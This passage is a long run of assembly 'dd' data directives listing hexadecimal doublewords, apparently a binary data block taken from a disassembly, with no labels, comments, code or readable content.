		dd 0C408D9C3h, 6A0E5F59h, 569C9DC1h, 0D0A1B9CAh, 254608B9h
		dd 94E3CDE4h, 9625D1D3h, 53B76A55h, 3CAD4F9Eh, 4FC50562h
		dd 0EA484C69h, 0BBF3A124h, 4B2C551Fh, 72DCEDDCh, 769CBBBh
		dd 9A95EF9Eh, 88CEAE99h, 6920A3A5h, 0AC086A9Fh,	0C3A1B24Ch
		dd 0A04D9D2Ah, 0BEFA2914h, 7C5C5F9Fh, 8397E866h, 0AD1C0F0Fh
		dd 0AB2AF048h, 84E7575h, 922451A8h, 0B75C6D15h,	7A70B462h
		dd 0BF2F6E78h, 0E279A27Eh, 41612D8Bh, 15C1C3FBh, 52C4F83Ah
		dd 0DC0F4330h, 0E8E7B6FDh, 6935DEFDh, 0ADF4E009h, 2510D269h
		dd 0AD12EF1Eh, 0A054A640h, 7B390952h, 0C6FC91DAh, 0F84A713h
		dd 5FBD3636h, 1ED2A53Bh, 9EAC6C45h, 531E7DB6h, 0C2F4F54Ah
		dd 62FE2FC8h, 8650F498h, 5C4A0F74h, 0E5AA3956h,	0C114EE42h
		dd 95B7B8BEh, 0D19DE2BCh, 0AF4CF6C4h, 854BB2CAh, 999349ADh
		dd 89D266E2h, 8727F4FAh, 78122317h, 0FDEC281Ch,	94AAF7FCh
		dd 2CF2EA2h, 6E3D104Ah,	0CAEE0FAEh, 7B50F29h, 91FC0FA6h
		dd 78749495h, 0AF117F4h, 2B727A0Ah, 5988B578h, 2982DCEh
		dd 0D42A02A3h, 0B739E017h, 3F2F0FF7h, 0DA65F7EBh, 0FB1528EEh
		dd 0BBB474C8h, 7C6D9FB3h, 0AE7D3383h, 0F0F9BB67h, 0F5669861h
		dd 69C8AB6Eh, 56737DD5h, 2B06F840h, 12C92CB3h, 2FA27611h
		dd 6C90D6BAh, 6770A268h, 695CFC35h, 177383Fh, 51619193h
		dd 0FD12C894h, 0A6F74E8Bh, 6A59A56Bh, 0B402A2CDh, 96BBDA12h
		dd 9F622F26h, 5BE4ECFEh, 0EA4C956Ch, 207E7D76h,	738A4D86h
		dd 95426B84h, 80570AB5h, 542C4E69h, 137A636Ah, 23388D6Eh
		dd 4FB179A3h, 0F3350499h, 0B0C435FAh, 1DD87561h, 9FBCA34h
		dd 978E1FF9h, 26CEB376h, 7CDEBB46h, 9C4DEE38h, 4E07840Fh
		dd 0B4B8DE62h, 0E08F8AD1h, 0E95E439Ch, 0E7AABEE2h, 0CB41F242h
		dd 0F6A9D508h, 0CBEDC7A9h, 2623D516h, 0C2453314h, 75285CD7h
		dd 356D2238h, 8B861A09h, 0CA9481ABh, 17841D49h,	0AAE692E3h
		dd 0D5A8B4FEh, 11660969h, 47AC0BA1h, 0AA0F7597h, 7048C755h
		dd 0B646E1B4h, 0F5B8E522h, 7B959BEFh, 28852469h, 774F649Bh
		dd 7D89BAB1h, 0A949018Eh, 8ED6AB70h, 0C6B0A556h, 0B729177Ah
		dd 0DB51565Fh, 19DF8E92h, 5589BA68h, 0EDDB4C79h, 1CDC26EEh
		dd 95CEF2A1h, 4BFC0F87h, 88ACB176h, 30157698h, 57D985Dh
		dd 0F5FD864h, 288D6113h, 5216262Ah, 0A2AA3357h,	1163625Fh
		dd 9B45C5C9h, 0E27811B5h, 0F4A35DAAh, 8468EF94h, 39E1F93h
		dd 17045125h, 0EA21A171h, 56C97BF6h, 9F0795F2h,	9B688182h
		dd 7DF5642Fh, 0AA1F89F8h, 48603E8Fh, 6C0F8C38h,	96EDF11Eh
		dd 0EAF2174Bh, 7C397492h, 0A9F4A37Ch, 5B153B47h, 6C384622h
		dd 0D9649CB1h, 54B9705Dh, 39333478h, 4ADAA271h,	64FCE427h
		dd 0FBB2429Dh, 78ECDEC5h, 0F22FC2FEh, 67A07AC9h, 295BC7FFh
		dd 3BCA865Dh, 0AC8E615Eh, 0DB5891F6h, 9B8C7B94h, 0F514A3D0h
		dd 9AE8D12h, 0C7255F42h, 0B07E1DDBh, 54137AE1h,	0DF533E1Dh
		dd 0B9F1754Dh, 0C5A33A32h, 0C54BDF9Dh, 6D6C13F4h, 4239703Ch
		dd 0E2D5C295h, 0C87E7D75h, 0AE502C55h, 0F6CF2759h, 37CA7130h
		dd 0F9C4834Fh, 42CA29B2h, 752C5DC4h, 56A35D1Ch,	530319E5h
		dd 6AC6518Eh, 5B2E9F56h, 0F1A49D2Ch, 0EFF5A7EFh, 0D24974C7h
		dd 0C5F19E20h, 74ACEEA6h, 0CEFAF3C0h, 7083175Dh, 499681BEh
		dd 82DBA1Fh, 808FAEAFh,	0A4F6C274h, 57CF3FEDh, 0F3A7BC56h
		dd 9DA68299h, 0A44E6BDEh, 34C6A8B2h, 92AC38D4h,	3BB87DCFh
		dd 0AC1D8937h, 0C841BF99h, 6FE52628h, 7805A9E2h, 88239DE0h
		dd 63F57770h, 0A201C9Dh, 0C5257839h, 69478513h,	0DDFDD007h
		dd 0E0C36830h, 2DB4FFCBh, 6A079B00h, 0C9B37663h, 0F643A960h
		dd 0E4321A53h, 5855EFE8h, 81E1768Eh, 3999B2DBh,	4F5ACEF7h
		dd 0B4E2F17Eh, 5BC935D0h, 0CA4BEBAFh, 9684971h,	970269CCh
		dd 20E6F47Fh, 6BC6BA73h, 5414BC77h, 0E28F38A8h,	4665AC5Bh
		dd 4C52FD87h, 7C088638h, 5E390470h, 5CF22F6h, 460A40DBh
		dd 17129DCBh, 2AE2116h,	0DB3D53EFh, 0F864452h, 0C4FEF8D5h
		dd 74F44D77h, 0EFD7F6AFh, 62258BF2h, 8660EA1Dh,	27FA39F3h
		dd 0E0F20ED2h, 1ECF7545h, 37562238h, 0F3487B4Bh, 1727922Ah
		dd 0DA2A21DEh, 0AF474F8Ah, 80D17AE1h, 45D54AF7h, 8FFA2F63h
		dd 0E92D8CC1h, 5A04677Ch, 525DC5D8h, 4B463F1Bh,	0D3F3728Dh
		dd 140B8667h, 0FAC928C9h, 0C7AC5C4Dh, 87273775h, 89E826E2h
		dd 68919891h, 0E8A66644h, 9E2DDB32h, 0D59BE3B8h, 3656C5A6h
		dd 8D6E23A4h, 8A86B12Bh, 9365AABAh, 19A42FF6h, 0B50AFE2Eh
		dd 0A1CC7B6Ah, 78AD99DCh, 0A03A5CB6h, 0F48D97B3h, 85EBA3F0h
		dd 15652F1Ah, 0A4AF079Ch, 0AD1D6470h, 0D5641653h, 0EFCD179h
		dd 1F2D19B4h, 0CC5905DCh, 7F004321h, 86BA60E5h,	95D17502h
		dd 3ACB6058h, 0B9B6FCC9h, 4ED72A7Fh, 34BE697h, 51927277h
		dd 1C763D0Bh, 0A32189E6h, 0CFE35260h, 0A7976F63h, 734C113Bh
		dd 8CBE9585h, 4B4441BAh, 0DE136308h, 77E91814h,	36AD176Dh
		dd 2CF52807h, 7F875B1Ch, 0F76C420h, 9F01591Fh, 0D2EF7275h
		dd 2FA37F7Dh, 0B2D68781h, 0EA3FDB2Dh, 0D51DEC4Ah, 0EA04D3EDh
		dd 0E6AC791Ah, 254E506Eh, 0D56F0C5Fh, 0F1D1D11Ah, 5E35722Dh
		dd 0FC11375h, 23CC6E3Fh, 0B3235F96h, 237C0F6Fh,	0B6E8E575h
		dd 8603B576h, 98D58547h, 82DC53E1h, 8FD5ABF8h, 0AA8A0B4Ch
		dd 0E8F233FCh, 0D5A2C29Ah, 1D4EB20h, 5CED14E0h,	0CCCB3913h
		dd 0BD173DFDh, 33D0C661h, 3ECB41B4h, 53F787E2h,	0D712C9FBh
		dd 7BD5FB89h, 0AE59DEB2h, 0D2B3DECCh, 0B3F25E50h, 6AFFF573h
		dd 4CD4B8CFh, 419006D0h, 0C172EEECh, 4AA98EFEh,	3DA777ABh
		dd 0BED64D1Bh, 0B5F6B7AEh, 0ABDC68BEh, 0E38F4D34h, 46C8A22Fh
		dd 3CAFB4B3h, 6216B376h, 0A53DA611h, 0FD9B2AAAh, 33F91AA0h
		dd 0DBAB132Bh, 0B5A68810h, 0F796108Dh, 5B599CC0h, 0A0772788h
		dd 0C573F7D6h, 0B55E8D23h, 137D2E72h, 0EF211D8h, 7689D7B5h
		dd 0B9FD8BBh, 0F15F860Fh, 0D726BC36h, 5D9E5B92h, 6C136FB5h
		dd 0CD05FF6Dh, 0E0EF250Eh, 52BCD3ACh, 142E4C0Eh, 5F6C0B60h
		dd 889CA515h, 0AC06C168h, 1F2B7D64h, 445F5578h,	1932D976h
		dd 1D8CEBD1h, 0CB29CD64h, 6914CA9Fh, 89632557h,	0AD19660Ch
		dd 85EAD8F7h, 3E9F896Ah, 13071AA3h, 0F0386455h,	8CA168C0h
		dd 715290BEh, 337E94E2h, 0F3E55A1Ch, 0E6D4108Bh, 0B1980DDDh
		dd 924F7F33h, 0F6D15476h, 679C72ACh, 862FEF9Fh,	0F5F636D6h
		dd 37098A52h, 0BD7B6E72h
		dd 0FC77F3F5h, 0A7386C10h, 45285B7Ch, 726275DDh, 0ACE888B4h
		dd 0BAEB7A4Fh, 594226D2h, 5D2E95F5h, 0E69A852Fh, 57E80CD5h
		dd 0D72F6066h, 1E805AA4h, 0B7F1874Bh, 1C15A39Fh, 0C566423Ah
		dd 0E2E6EA00h, 39AAA378h, 0B27EADF0h, 1FBEAECAh, 22424693h
		dd 0B793F3B3h, 0F655FB38h, 406D2BB9h, 1896F893h, 49F497EAh
		dd 0EB3B259Ah, 25C9D552h, 0C7AF502Bh, 4F57E766h, 436E50A4h
		dd 0D506C179h, 9BAD3789h, 0FE1889F1h, 16CBF3B7h, 72F2F1FCh
		dd 0DFBF5D4Eh, 0E464763h, 59091285h, 0F5508467h, 0A36538F9h
		dd 89608B66h, 3E22CC0Dh, 12EFA838h, 9B48B8C5h, 0B6DAB607h
		dd 0AC27FD16h, 0DE3E3D9Ah, 8962C17Bh, 9C6FB7ADh, 790B5F8Dh
		dd 0FC4B5706h, 0AB4B8EB4h, 0A1BDFCD8h, 0EFC6BF66h, 72A11DE3h
		dd 0A1337C15h, 0F21D2372h, 0C3524B92h, 8B41F5E2h, 0BB0F67D0h
		dd 65C795FCh, 6E511EFEh, 0BF8B506Ah, 6049C55Dh,	0AB8CE8BEh
		dd 6C1C48E8h, 0E2895A48h, 3E111F47h, 0F34C82CBh, 1E4688E4h
		dd 7744FA38h, 0F507DFE8h, 912FBF32h, 93D6ED4Ch,	0F8C5C50Dh
		dd 0CE9743F0h, 7BFACF8Ch, 0E1EF9BE0h, 0D6592FCDh, 0DAB6E6A1h
		dd 9DCBA839h, 4D8D201Ah, 0CB2F02CEh, 14CA0666h,	7F1C75ADh
		dd 0ED326C23h, 19310FBFh, 0CE9CC8D4h, 0DC94343Eh, 6F5CF8BFh
		dd 31EE12D9h, 173FBB2Ch, 0F78E96B3h, 0F97D0FDCh, 1DED1F8Ch
		dd 109A5AD0h, 0AA397D3Dh, 156EE69Bh, 4B5D1DA9h,	569F488h
		dd 0D1F58C78h, 6A45DC4Ah, 5BE781F3h, 873AB47Ah,	8F8E6552h
		dd 0A69CDAB3h, 61F1D5F1h, 9B71EDECh, 40FBCF0Bh,	1F3C30A5h
		dd 9CE3E5FEh, 227F6446h, 0C2CBDB64h, 0D87E7094h, 0C85B373Ch
		dd 8C7A2EA9h, 3F9AE315h, 0A4C9AFDh, 0D189B7D8h,	41269E22h
		dd 6E07D029h, 58DC8620h, 78CAA4C7h, 7BBCBF88h, 0B4D6E29h
		dd 0BAF58DA3h, 13616469h, 0C3F047A6h, 0DCB8AFCAh, 9F4159C5h
		dd 0E0F191FFh, 2D6C64C8h, 731B56F4h, 7DF1CD9Fh,	5CEB43B8h
		dd 33CF71B7h, 5E2713FDh, 0ACABD35h, 51CCADFAh, 51EAF12Ch
		dd 98B74A93h, 0CE064825h, 0A0C5D92Ch, 0AB44B573h, 8FA2F681h
		dd 0C497BA09h, 0A8C6BD0Bh, 65D1D439h, 0BBCD1DD4h, 0A0AD7A97h
		dd 0BFBBE74Ah, 0E1B34A5Fh, 1AEBC725h, 0FECD6D0Bh, 2B7160DDh
		dd 324F7A1Eh, 0D4E78C30h, 9137C64Fh, 55368532h,	29AC8AEh
		dd 0D01BE309h, 0EC74BCFCh, 3F92BB17h, 32AAFBAEh, 0A2EFEDA5h
		dd 56ABDD82h, 0BF8F8957h, 648306A2h, 0F987A034h, 0A0F6625h
		dd 0CBA8E0ECh, 13082DC8h, 0A730A29Ah, 22ED84ADh, 0EFAFD68Bh
		dd 8477D198h, 0E6340A0Eh, 0BAB119CFh, 268340D4h, 323AEF1Ch
		dd 12517CCCh, 0DF78733Ch, 0D6C634F8h, 504D817Dh, 0FD17F07Dh
		dd 6699C78Eh, 713590B3h, 318B0750h, 0E6758BCFh,	0F20A8A42h
		dd 0EE50428Ah, 910C4EE2h, 0E35DA69Fh, 8CB59F97h, 6C53E9DEh
		dd 66FB0379h, 0EB677B4Ah, 0E1C003C8h, 0AF5B6EA0h, 58DBEC55h
		dd 0D03F4B44h, 0ABEB332Dh, 1689B833h, 0E936E76Ah, 27FCDD1Ah
		dd 84BF7065h, 50A6B92Dh, 82978217h, 6B945682h, 67C38E82h
		dd 0F396D4BAh, 6329ADD5h, 18EC8CDCh, 0A677A174h, 0D3C53CAAh
		dd 1F9EE53Ah, 0B6E96B78h, 445D7A9Dh, 0A8AF1D23h, 3E11ADD4h
		dd 8897CAF2h, 8A760D68h, 0E179559Eh, 36536577h,	6B499DF0h
		dd 0A398F3EEh, 0DDD03398h, 37DFC9E4h, 0A4FCCC6Ah, 0B6F4873Bh
		dd 8A1E1F41h, 0E1680FA7h, 407C4AE9h, 51EDD0E0h,	0E94DB9E6h
		dd 0B92EDAF6h, 0D5A32A0Bh, 3604BA6h, 0D96E9A7Dh, 40635008h
		dd 7A2B4AD1h, 0FEBB989h, 0B93619DCh, 0BBAB39D2h, 5A3FD57h
		dd 6299BA63h, 97591376h, 7692B67Ah, 87445095h, 557C655Dh
		dd 0B508C850h, 0ACB1BF26h, 38640B88h, 87F88F6Eh, 0BC79EE9h
		dd 0A0CA573Eh, 0D99B9E7Bh, 0F66D4066h, 609F56AEh, 4AEE10C9h
		dd 0AE27D22Eh, 61276C51h, 2DD72ED1h, 35D25FBBh,	380990B4h
		dd 3874EE5h, 1EDD2241h,	44D0AAADh, 5C356B28h, 24976E6Ah
		dd 0FA3ED1E2h, 1C685670h, 4F480F1Eh, 8C6AA7BBh,	0D0F384ABh
		dd 0B2996C35h, 683C5DC9h, 0CC7D11C3h, 9595E6B6h, 2A87F8CCh
		dd 58A01731h, 256E4D62h, 5C925599h, 96A0F09h, 3516D9DAh
		dd 394A7AA2h, 3F4B24C9h, 2CD7C8E1h, 5969006Dh, 0F5C2C3F1h
		dd 0C8F408Ch, 0E019C218h, 1E6B0427h, 13FBFFDBh,	6DB84C05h
		dd 0CE7DF675h, 8BC6FDFBh, 0FB196C58h, 0CD509F0Eh, 3493A78Fh
		dd 89B8A8DAh, 6E1F37E5h, 0D3AA30FCh, 0E838DA60h, 84E14E2Ch
		dd 1AE890E8h, 48CAAA3Bh, 933769D5h, 9B69A746h, 7CDA54BAh
		dd 9A6BA4C6h, 0C303023h, 26FE97D0h, 0C7B47648h,	336ED184h
		dd 9D58D0D5h, 6C4EE426h, 19D7E316h, 0BE07282Ah,	6BE90220h
		dd 762833F9h, 696A249Fh, 49E68F1Eh, 72B3D8BCh, 3CDC071Ah
		dd 5498335Bh, 9D5D1760h, 0B20B7E03h, 0B2905D1Ch, 8CE3EE9Fh
		dd 0D8245CA0h, 4071B732h, 43879C28h, 7D3BEF47h,	1BA8E19Ah
		dd 0DB229C1Fh, 4FE22D97h, 1A8B8CBDh, 0E242B9B6h, 0FC76D283h
		dd 0FD212D30h, 45626153h, 0F2497FDBh, 0D514341Eh, 5DADAE07h
		dd 0B2E18F74h, 308FCBEBh, 50EAAAA2h, 9BB1B3ACh,	75B258BEh
		dd 0FBCB175Dh, 384C0C82h, 0FA93E37Dh, 0F8A4506h, 0E938ECCCh
		dd 0A4291130h, 38B24AAh, 0B4487B97h, 3758D58Eh,	52AC3879h
		dd 255FE762h, 0E992E2CCh, 3E07D4ABh, 0A14F9BE9h, 4945925Fh
		dd 8F3FC3F0h, 30FCDF6Ch, 0ACBAC6E6h, 0A4C01C0Eh, 9D0A42A9h
		dd 98C2F8BDh, 0E79B35B9h, 0E7601E84h, 0FD4289CFh, 645D6612h
		dd 0CF259D07h, 0A3E0470Fh, 77A43193h, 0C90EE341h, 0D8990F9Eh
		dd 0D68C46A6h, 5566B72Bh, 0BB532AC8h, 0B61FD2EEh, 0EC1CDDC6h
		dd 379A8FECh, 52D62EE3h, 0BF6D5C51h, 5CED24DBh,	3136B164h
		dd 6854593Eh, 5FF02AD1h, 0B02BB4E3h, 0C1321F20h, 0EA56C6ADh
		dd 0C251B070h, 0E7298E77h, 5C598351h, 0E778FDCBh, 4E78872h
		dd 5D9EECDAh, 4FBF8D37h, 0DAAE7657h, 0F1C74251h, 821107EFh
		dd 0E5E37EA2h, 0B4E22287h, 0E95F4D4Dh, 9CFDACC6h, 8A1FD9C2h
		dd 659F2A1Fh, 568D888Ch, 0D40B0616h, 206E4915h,	6326D905h
		dd 0F3BEE967h, 33CFC93Bh, 0EB285129h, 0F4EDFBE4h, 0D0FAB593h
		dd 903EFB4h, 33EFAA09h,	1EE985E2h, 1949BC0Bh, 8EEAADA2h
		dd 8CC42FFEh, 0FC3696Ah, 0A03077C1h, 8B57775Fh,	64B0CF56h
		dd 22BF3103h, 10557C03h, 676A457Dh, 0E5508E68h,	1846DA95h
		dd 3131F295h, 646EB2E0h, 0EFC6075Eh, 0FB19151Fh, 4A49C6E7h
		dd 0F9A3725h, 0C0FD2B55h, 5D7C1D7Bh, 3AFBB5BCh,	31D8A46Fh
		dd 51FE5D94h, 0E3EDF6C9h, 637ED423h, 573D9325h,	0B2CA37CCh
		dd 6F41BCB4h, 7E781982h, 75827FDEh, 3940BBCEh, 0E3A6F2BCh
		dd 0A6AF2A6Eh, 6B9587Ch, 647E98A8h, 758EFE96h, 0F691A878h
		dd 0AE44C889h, 0A2B233BCh, 0BE6229EDh, 35B01861h, 9D277C56h
		dd 3B0881FEh, 0FF879177h, 0CACF1A6Eh, 125873DCh, 6AA12DCCh
		dd 0EB511220h, 0F9F84EC0h, 543FC2AFh, 0D4B15B68h, 4C941BDDh
		dd 94811CD6h, 0C6A88DA5h, 0ACF49857h, 57C1C094h, 0FA81A2D1h
		dd 31E0D5AEh, 63757FB9h, 4D241DC6h, 7399CF24h, 95AFC0FBh
		dd 0EBC21D84h, 4789EADEh, 98ED6C53h, 0E5F5CA74h, 6769CCD9h
		dd 0EA2AB3C5h, 0AEAD96FAh, 69C1D68Ch, 8BA173EFh, 0AACF3F8Fh
		dd 0D4C8DF7Ch, 7E8B6674h, 9A74B948h, 35CB18C7h,	838438DCh
		dd 77BFE102h, 0EFDD7C95h, 1F3B3DD3h, 2299CDE9h,	2450D97Dh
		dd 0C7DE7591h, 98192A9h, 0BCD766Fh, 2EF20D37h, 9732C655h
		dd 0B0FC10FAh, 9AC553B3h
		dd 0ACEE77C7h, 7CE5A36Ah, 6EF4E3EAh, 65C334DDh,	7825BF2Fh
		dd 8A72977Fh, 0D5DF6386h, 0D87825F6h, 72562304h, 0F9559F43h
		dd 0EB9A3293h, 143D76E3h, 8D16AC50h, 42222314h,	0D955CCBEh
		dd 11FEE42Ah, 9F845F86h, 4BFD7A71h, 5FC3F860h, 0FE773E3Bh
		dd 7A101744h, 9B5ECBB8h, 3F03A938h, 0AEF3CC64h,	582C82C1h
		dd 0A7340C8Ah, 0E2EB7B46h, 0C08BD57Bh, 1592C482h, 36A695AEh
		dd 0A1F8C41Dh, 4D6D8AFAh, 0BAA43BA5h, 0EB6BC2B3h, 0A0862C98h
		dd 28D2D6B9h, 824D2BF6h, 235CCF3Bh, 7214DFBEh, 9773B0A8h
		dd 80AF6510h, 0DA92DCD3h, 0B8AA2BF6h, 55F6CCC9h, 3D0E03FEh
		dd 0CEBA85C8h, 0DCCB47CBh, 0B99B818Dh, 87FE07Ah, 0C6C1456h
		dd 6EAEEEA1h, 0CAC114D0h, 0BFA4C58Ah, 0E7F16E5Fh, 13EFC4F6h
		dd 0C80BD73Eh, 0DE7AB6A5h, 1712F0A6h, 0FECF840Fh, 2E2B7DE5h
		dd 0F4044459h, 6B2ED56Eh, 5E6EBFEEh, 0AEC2DDC1h, 87BA2A4Ah
		dd 6D7E8E3Ah, 7E675D63h, 0DD42D56Eh, 7E56A3EAh,	0E6CD22D7h
		dd 0C5FD07EFh, 0A8D2553Fh, 0D632F63Ch, 6E4C17E7h, 0F7BF87B4h
		dd 0ABC1D589h, 698DD4A5h, 4ECF7A68h, 0E4711312h, 2926337Eh
		dd 0D18D7E5Fh, 4318E146h, 0C9DB1909h, 4F15B315h, 0F6C9F64Fh
		dd 97F065C6h, 193B0AF4h, 0D6A337ADh, 78D30DCAh,	549B5C42h
		dd 91611FCAh, 0E4A0EC3Dh, 0F70D5D00h, 1EF366D8h, 0F3A7E244h
		dd 979A2289h, 2426F72h,	9FEDCACEh, 0A2EAB428h, 8AD5CDB3h
		dd 4F8E8E89h, 5278BD48h, 0C2B35C1h, 5FE8B35Dh, 9786F53Fh
		dd 0C443F81Eh, 7CFB7506h, 0A59AF157h, 4E5B6009h, 0C1DB3BD1h
		dd 0A449E2E8h, 34B27498h, 0A27F7DE6h, 64446F82h, 0B41A3D7Dh
		dd 9464FD5Fh, 4D205045h, 0EECA2D16h, 622DD1EDh,	6703CECEh
		dd 7FBEF554h, 0A0A83051h, 54ABD578h, 3B63BE45h,	0F4252DBh
		dd 42D1D039h, 34C44510h, 0E940808Ah, 2CFFDB75h,	0DA31D1DCh
		dd 0A4F5A57Eh, 3A1BB364h, 0C1AD169Ch, 968F0373h, 89D42D14h
		dd 0B50D0A37h, 0F9EF45CBh, 36D0A2E2h, 84706B7Dh, 45EE55A0h
		dd 0D1AEA26Bh, 53FE5722h, 4D5C237h, 3EB50FCh, 7A999ACBh
		dd 0F476FA74h, 0F575B70Ch, 7186686Ch, 73B6A5A2h, 8D88C2C1h
		dd 0DD428DA4h, 1B4B26A1h, 0EBCD8387h, 9B15B1D0h, 491D9513h
		dd 498CE07Ah, 36D3D373h, 639318E6h, 5DD37D76h, 7325D917h
		dd 83A4DE3Bh, 0F8C1C140h, 10BE52A5h, 1A9BF2A8h,	7671292h
		dd 0D7593755h, 95A33BB4h, 0B5AE30EAh, 26C15BEBh, 136458B6h
		dd 7D1E997Dh, 0BE755FEDh, 3B101A68h, 0FB16FB16h, 8B2D2C2Ah
		dd 7B1505B6h, 0BE8AC22Ch, 91FA998Ah, 6E33119Ch,	9A5508D1h
		dd 0C8B7B09Ah, 214B8797h, 0CC626D41h, 4E57C4B9h, 0DA154189h
		dd 0DF58FE2Eh, 7A6998CEh, 6D8AD428h, 0CF558393h, 329CD3A1h
		dd 31644419h, 0AB2B2620h, 8D68863Ah, 0ED06256Eh, 1B471A8Ah
		dd 9B8ABCEDh, 47B2A576h, 0F1F9A32Fh, 0FEBAF0Bh,	55F61D73h
		dd 0F7E885AFh, 0AF9D1667h, 0E043F07Dh, 0EBAB85D7h, 0AA6F178h
		dd 59B9A9D2h, 6CDAB741h, 3EC43036h, 3E9E8A31h, 8EBCC678h
		dd 33244C9Eh, 0EACB5993h, 0D68F609Eh, 0D81E49Ah, 0CDB991FCh
		dd 0B14357EDh, 7F98FB6h, 72E2E79Bh, 0E986652Fh,	11628A15h
		dd 8E4CDBB1h, 0F845236Ah, 29AA61DCh, 1DCD9232h,	702BDFE4h
		dd 433A72D2h, 84825D1Eh, 54C5A5DBh, 0D9F6EB8Ch,	0C7347251h
		dd 52C82B08h, 15FCB075h, 0BF0C3432h, 9507A9F2h,	0A2AAD36Bh
		dd 4AB0A98Eh, 5EBEFD00h, 398B9673h, 36C36FAEh, 0F95520D1h
		dd 0DC45D34Bh, 0DF7BE902h, 48123C1Fh, 4CA88156h, 7CC4B45Dh
		dd 0C33B2FA3h, 9A5A515Fh, 55BF3FD8h, 0EDFCBF0Bh, 387168CAh
		dd 5B796C29h, 2ADF7C0Fh, 76E92AD1h, 105D71F0h, 8DFE5291h
		dd 0AC23EC0Dh, 54DE70EAh, 0E16BB472h, 0DD50A24Dh, 6B102CA6h
		dd 0CFAAB1A3h, 55083650h, 0EDA2078Bh, 766FC487h, 35899117h
		dd 0E2B08EF7h, 358F26E0h, 50D83E09h, 4FB2B129h,	0C33E261Bh
		dd 4312EEDFh, 0DF9D6FE7h, 30B739DFh, 5A15F1CEh,	0DC2DF1F9h
		dd 8A9C4B90h, 0DD75C4D5h, 0B1ACF212h, 67AE18E9h, 0B374F56h
		dd 0A5F55653h, 0AEBFD8Dh, 0EF784AB5h, 0A945A18Bh, 0A4D1762Ah
		dd 9F7DA03Ah, 15EA8CD1h, 9FB8D83Ah, 81358EA5h, 36608D6Bh
		dd 2A94195Ah, 8442B0Ah,	1E343F2Eh, 5ED96FF8h, 0B63BEA05h
		dd 0C667A956h, 58D50B0Fh, 0CFCE148Bh, 7EBD8303h, 61A6CE2Eh
		dd 0F56CD662h, 1CF1B89Ch, 0A7576F39h, 0B16A7E45h, 0FB3D89ACh
		dd 0F83557FFh, 81F923EDh, 13EC6E77h, 0A88E4073h, 3D542AA5h
		dd 0EBA63D96h, 0BA0A63C9h, 89CC86DBh, 0D9B2AB0Bh, 0C448DEF0h
		dd 51302A2Bh, 0B048A771h, 0EA940B2Bh, 57BA54F9h, 59D05715h
		dd 5948D6F2h, 0DD488851h, 70396D17h, 0F58F651Dh, 725F2A55h
		dd 69BAC62Bh, 25D09C09h, 0AA90A93Ch, 0E215D7EFh, 5815D787h
		dd 7D1B04C6h, 97F3864Ah, 7D8DCF66h, 0A49985CDh,	1C9AAF54h
		dd 0DC355552h, 365D522Ch, 2C0A5F92h, 0A33D7861h, 0B29A0605h
		dd 0C343615Eh, 0A95C8B0Fh, 8B84B1CCh, 0CBACB92Dh, 0F73B6576h
		dd 23975E74h, 8372864Fh, 4CC4DD18h, 0D6564A3Ch,	653A9C91h
		dd 0BEEC7799h, 196D907Eh, 0E574C698h, 0BFD96C6Ah, 0BC69FB46h
		dd 55A7199Bh, 8C4784BAh, 1B47EE88h, 317C7FBBh, 6037FA66h
		dd 0E4F31973h, 7159DF1Ah, 0DCA04831h, 0AB46E709h, 3639D392h
		dd 87B64872h, 697B99D9h, 0A70A7CF5h, 2B9312Fh, 312575B7h
		dd 90CD22DEh, 9CFC70A9h, 5D7BAD05h, 2EA8C969h, 0D051CBA4h
		dd 0AD186025h, 0AC31B884h, 9B53624Bh, 65CD2595h, 3C0FA92Ch
		dd 0EE81BDF9h, 6A6AAF6Dh, 7FC3CF25h, 0B94B963Eh, 325A5459h
		dd 0D688AEDFh, 0D89B7A33h, 0A1470EA9h, 73F1154Fh, 0D4CFD655h
		dd 0A12D7F64h, 9FE83DD7h, 0D58CA929h, 0F5E0F602h, 1BC66356h
		dd 0B51D7B11h, 47AE7BC6h, 9C72471Ah, 0E3BC48D3h, 0C75CBD91h
		dd 6F158352h, 730BADEAh, 0D8B1708Fh, 62B4E964h,	0A9B32A42h
		dd 2E9AA26Ch, 0F83FC560h, 7E6E5CE1h, 0E1782525h, 0A5E54B47h
		dd 0C6353568h, 0A97D7B40h, 5FD388C5h, 54B70764h, 566E9958h
		dd 3313225h, 552D517Ch,	6A16E798h, 5AA086C4h, 0B90AE5C9h
		dd 0F7957D69h, 73CF0497h, 0F77B505Fh, 521FACBDh, 46251DB8h
		dd 1828AF8Eh, 0EE44386Ch, 5206DB31h, 7936D74Dh,	0AF6A303Fh
		dd 0E4204BB8h, 47FDA5EFh, 9FBF06DFh, 33BE2294h,	6ACD414Fh
		dd 0E0D25C84h, 58612703h, 0D75EFAB5h, 0F0D060C2h, 0E4704642h
		dd 4D8224CEh, 0EF717187h, 2242FFCFh, 56EF3B46h,	0CF07CEB3h
		dd 0C0A1903Eh, 4D86C707h, 0D6878997h, 0CFFDD7F5h, 0F708E1FDh
		dd 0A54675A5h, 0F460E9E1h, 17E6D1EAh, 61746B32h, 44104AFh
		dd 0A8658B32h, 90511B06h, 52721CFDh, 56DBCFD5h,	1006B7B2h
		dd 85A368B3h, 50941FE6h, 0C0FD71Eh, 9B9842F9h, 6ED73A67h
		dd 859EE2E5h, 0B794B504h, 0FC4DF851h, 7C6DF2B0h, 99B2B1F9h
		dd 52543C5Dh, 15E946BDh, 0FB26BE26h, 0DBBC3EB9h, 5CCE7EF5h
		dd 8BF449F1h, 79187AABh, 0B9C0DA24h, 8E133C52h,	0DEAFE703h
		dd 0FA2B7677h, 0CE2D21E7h, 17F4DD73h, 0C12C790Bh, 0C0C3BFCAh
		dd 8BFEF6F5h, 0A33D63C4h, 45BBCBF2h, 0B5B7DA1Fh, 0FD98D168h
		dd 638A5205h, 7F728805h, 633AF0B2h, 7E328EB1h, 8C7B52F5h
		dd 0B524AA0Ch, 0EE48F806h, 0A3569F79h, 0D778BF11h, 4268F6CBh
		dd 855CC746h, 0CD622E7h, 0BFED358Ah, 0C222392Eh, 6DE555EEh
		dd 236596FDh, 0B569717Eh, 2D194BBEh, 439961h, 4A7789FDh
		dd 652D7BCBh, 77634DC4h
		dd 1191029h, 0AEFA60B8h, 0FB838F75h, 35E0AB7h, 0CBE5F76h
		dd 4FF2EB29h, 0AA13484Fh, 8E4E0986h, 4C456686h,	0FC54A10Ch
		dd 73AC7F2Eh, 0D6F1FB9Ah, 0E05A46D4h, 6A2A2ACDh, 0B74902C4h
		dd 6B7EB952h, 5D3790Eh,	9B1A71D4h, 0E3B824B0h, 5272E0F0h
		dd 5CD11E5Ch, 931A5AE4h, 5D0C2D1Dh, 835FFE80h, 0A751DEBCh
